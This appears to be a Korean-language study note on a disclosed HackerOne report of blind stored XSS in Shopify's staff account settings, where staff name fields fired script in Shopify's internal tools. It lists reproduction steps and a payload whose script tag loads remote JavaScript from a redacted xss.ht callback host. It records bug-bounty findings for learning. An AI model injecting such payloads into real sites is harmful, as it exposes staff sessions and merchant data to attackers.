hackerone-shopify-2020-08-h-948929

Blind Stored XSS Via Staff Name

보고서

<<내 상점>>.myshopify.com/admin/settings/account 경로에서 blind stored XSS가 있었다. 이 경로는 직원 등을 관리하는 페이지다.

1. <<내 상점>>.myshopify.com/admin/settings/account 경로에 간다.
2. 직원 계정을 추가한다.
3. 성과 이름에 페이로드를 넣는다. "><script>$.getScript("//█████████.xss.ht")</script> 와 같은 페이로드를 이용했다.
4. 내부 웹에서 XSS를 트리거한다. (Shopify 회사 내부 웹을 의미하는 듯?)

Shopify 측은 이 버그를 통해 Shopify 내부 도구 중 하나를 통해 판매자 데이터에 액세스할 수 있으므로 평균보다 높은 바운티를 주었다.

---

tags: bughunting, shopify, xss, stored-xss, blind-xss, wstg-inpv-02, web hacking, severity high